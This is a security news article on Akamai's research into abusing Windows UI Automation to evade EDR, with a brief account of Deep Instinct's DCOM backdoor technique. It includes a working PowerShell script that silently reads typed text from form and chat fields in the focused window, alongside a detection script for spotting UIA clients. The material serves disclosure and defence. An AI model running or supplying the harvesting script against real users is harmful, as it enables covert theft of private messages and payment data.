A newly identified technique exploiting the Windows UI Automation (UIA) framework has been found capable of executing a range of malicious activities while evading endpoint detection and response (EDR) systems, according to a report from Akamai.
The UIA framework, first introduced in Windows XP, gives assistive technologies such as screen readers, and automated testing tools, programmatic access to the user interface (UI) elements of other applications. The same access is available to any program that calls the framework, and that broad, by-design reach has turned out to be a security blind spot.
Exploiting UI Automation
“To exploit this technique, a user must be convinced to run a program that uses UI Automation,” explained Tomer Peled, a security researcher at Akamai. “This can lead to stealthy command execution, harvesting of sensitive data, redirecting browsers to phishing websites, and more.”
The method uses the Component Object Model (COM) as its inter-process communication (IPC) channel to reach the application currently in focus. By registering event handlers that fire on UI changes, such as a window gaining focus, an attacker's program learns when a target is on screen and can then read or drive its UI elements. That is enough to read or manipulate messages in applications like Slack or WhatsApp, lift payment details from web forms, and issue commands, none of which looks abnormal to the endpoint.
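As an added illustration, not code from the Akamai report, the following Windows PowerShell 5.1 script uses the managed UIA client that ships with Windows to read the text of every edit control in whichever window currently has focus. It polls FocusedElement instead of registering a UIA event handler, because PowerShell script blocks cannot run on the thread UIA uses for callbacks; the technique described above registers handlers in a compiled client and reacts to events instead. The function name and the 500 ms poll interval are this example's own choices. Nothing here requires elevation, which is the point.

```powershell
# Added example (not Akamai's code): read the text of every edit control in the
# foreground window via UI Automation, from a plain user-level PowerShell session.
# Requires Windows PowerShell 5.1 (the .NET Framework UIA client assemblies).
Add-Type -AssemblyName UIAutomationClient
Add-Type -AssemblyName UIAutomationTypes

function Get-ForegroundEditValues {
    # The element that currently has keyboard focus, reached over COM.
    $focused = [System.Windows.Automation.AutomationElement]::FocusedElement
    if ($null -eq $focused) { return }

    # Walk up to the top-level window that owns the focused element;
    # the parent of a top-level window in the control view is the desktop root.
    $walker = [System.Windows.Automation.TreeWalker]::ControlViewWalker
    $root   = [System.Windows.Automation.AutomationElement]::RootElement
    $window = $focused
    while ($true) {
        $parent = $walker.GetParent($window)
        if ($null -eq $parent -or $parent -eq $root) { break }
        $window = $parent
    }

    # Every Edit control under that window, including ones scrolled out of view
    # that the control tree still exposes.
    $cond = New-Object System.Windows.Automation.PropertyCondition(
        [System.Windows.Automation.AutomationElement]::ControlTypeProperty,
        [System.Windows.Automation.ControlType]::Edit)
    $edits = $window.FindAll([System.Windows.Automation.TreeScope]::Descendants, $cond)

    $owner = Get-Process -Id $window.Current.ProcessId -ErrorAction SilentlyContinue
    foreach ($edit in $edits) {
        $pattern = $null
        # ValuePattern exposes what the user typed. Password boxes are the
        # exception: UIA does not return their contents through this pattern.
        if ($edit.TryGetCurrentPattern([System.Windows.Automation.ValuePattern]::Pattern, [ref]$pattern)) {
            [pscustomobject]@{
                Process = $owner.ProcessName
                Window  = $window.Current.Name
                Control = $edit.Current.Name
                Value   = $pattern.Current.Value
            }
        }
    }
}

# Poll for focus changes. Akamai's technique uses UIA event handlers instead;
# PowerShell script blocks cannot execute on UIA's callback thread, so we poll.
$lastHandle = 0
while ($true) {
    try {
        $handle = [System.Windows.Automation.AutomationElement]::FocusedElement.Current.NativeWindowHandle
    } catch {
        $handle = 0   # focus moved while we were reading it; try again next tick
    }
    if ($handle -ne 0 -and $handle -ne $lastHandle) {
        $lastHandle = $handle
        Get-ForegroundEditValues | Format-Table -AutoSize
    }
    Start-Sleep -Milliseconds 500
}
```

Run it, then click into a browser form or a chat window: the typed contents of the non-password fields appear in the console. No hooks are installed and no memory of the target process is read; everything arrives through the accessibility interfaces the target already exposes.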
Peled noted that the technique is technically a feature of UIA rather than a flaw. “This goes back to the intended purpose of the application: those permission levels have to exist to use it. This is why UIA is able to bypass Defender — the application finds nothing out of the ordinary.”
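Because the activity itself is legitimate API use, a first detection step is to know which processes are UIA clients at all. The following check is added here and is not taken from the report. It assumes that clients reach the framework through UIAutomationCore.dll (the native COM API) or UIAutomationClient.dll (the .NET wrapper); legitimate accessibility software, browsers and test tooling load these libraries too, so the output is a baseline for hunting, not an alert. The function name and the filter on the Windows directory are this example's own choices.

```powershell
# Added detection heuristic (not from the Akamai report): list processes that have
# loaded a UI Automation client library. Assumes the client reaches UIA through
# UIAutomationCore.dll (native COM API) or UIAutomationClient.dll (.NET wrapper).
function Get-UiaClientProcess {
    $uiaModules = @('UIAutomationCore.dll', 'UIAutomationClient.dll')
    foreach ($proc in Get-Process) {
        try {
            # Reading another process's module list needs query access; protected
            # or higher-integrity processes throw, so those are skipped here and
            # would need an elevated or EDR-side collector instead.
            $loaded    = $proc.Modules | Where-Object { $uiaModules -contains $_.ModuleName }
            $startTime = $proc.StartTime
        } catch {
            continue
        }
        if ($loaded) {
            [pscustomobject]@{
                ProcessName = $proc.ProcessName
                Id          = $proc.Id
                Path        = $proc.Path
                UiaModules  = ($loaded.ModuleName | Sort-Object -Unique) -join ', '
                StartTime   = $startTime
            }
        }
    }
}

# Baseline first: Narrator and other screen readers, browsers and test frameworks
# are expected UIA clients. Then look at newcomers, especially anything running
# from outside the Windows directory or from user-writable locations.
Get-UiaClientProcess |
    Where-Object { $_.Path -and $_.Path -notlike "$env:WINDIR\*" } |
    Sort-Object StartTime |
    Format-Table -AutoSize
```

Running this on a clean machine, then again after running the harvesting script above, shows the extra powershell.exe entry with UIAutomationClient.dll loaded. Anti-malware finds nothing wrong with that, as Peled notes; a defender has to supply the context of which processes should be accessibility clients.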
Broader Implications
The research highlights similarities between Windows UIA and Android’s Accessibility Services API, which has been widely exploited by malware to extract sensitive information. Peled also pointed out that attackers can interact with cached UI elements not currently visible on the screen, further extending the exploit’s potential impact.
DCOM Abuse Adds to Concerns
In a related development, cybersecurity firm Deep Instinct described a way to abuse the Distributed COM (DCOM) Remote Protocol. The protocol, which lets software components on different machines communicate over a network, can be used to plant a backdoor on a target system.
“The attack allows the writing of custom DLLs to a target machine, loading them to a service, and executing their functionality with arbitrary parameters,” said Eliran Nissan, a security researcher at Deep Instinct.
The method, dubbed “DCOM Upload & Execute,” writes the payload remotely into the victim’s Global Assembly Cache (GAC) and then executes it in the context of a service, in effect an embedded backdoor. It has limits: the attacker and victim machines must be in the same domain, and the upload and execution leave indicators of compromise (IoCs) that defenders can detect.
Call For Better Defences
The findings underscore the need for improved defences against potential misuse of accessibility and communication frameworks. “The research proves that many unexpected DCOM objects may be exploitable for lateral movement, and proper defences should be aligned,” Nissan said.
Taken together, the two disclosures show attackers turning legitimate Windows accessibility and communication mechanisms against their users, and they make the case for monitoring how those mechanisms are used rather than relying on detection of known-bad code alone.